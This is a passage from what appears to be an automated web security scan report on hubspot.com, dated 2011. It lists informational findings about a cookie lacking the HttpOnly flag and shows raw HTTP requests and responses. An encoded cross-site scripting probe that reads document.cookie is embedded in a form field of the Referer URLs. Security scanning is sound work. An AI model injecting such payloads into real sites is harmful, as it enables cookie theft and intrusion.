%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/css
Last-Modified: Mon, 27 Apr 2009 05:42:34 GMT
Accept-Ranges: bytes
ETag: "f29ffaf6fac6c91:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:19 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

11.111. http://www.hubspot.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=WKgwAbGjNvd_L5Sjca_ZGiQeGOse4LVTNTClGquFOagme1b9DaGg3i77--ZtCsgB_qoPi68P5im5CBHNF5q2boCtIh_cMqRr35MQ9cSEh8_bQJX81WHjkjYa0i7Fbjp5NfbbWxxv_RXX9So_mvtX224cBRoN02t2MCEIXyeG4n9Ts9XxRCrphB98h4g1&t=633615833537798980 HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 1638
Content-Type: text/css
Expires: Mon, 14 May 2012 16:47:48 GMT
Last-Modified: Thu, 06 Nov 2008 21:49:13 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sun, 15 May 2011 17:00:19 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

....radmenu
{
   white-space:nowrap;
   float:left;
   position:relative;
}

.radmenu:after
{
content: ".";
display: block;
height: 0;
clear: both;
visibility: hidden
...[SNIP]...

11.112. http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/ebooks/facebook-page-marketing-ebook-2011/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104 HTTP/1.1
Host: www.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.113. http://www.hubspot.com/portals/53/skins/hubspot/app/img/map.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/portals/53/skins/hubspot/app/img/map.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portals/53/skins/hubspot/app/img/map.png HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWR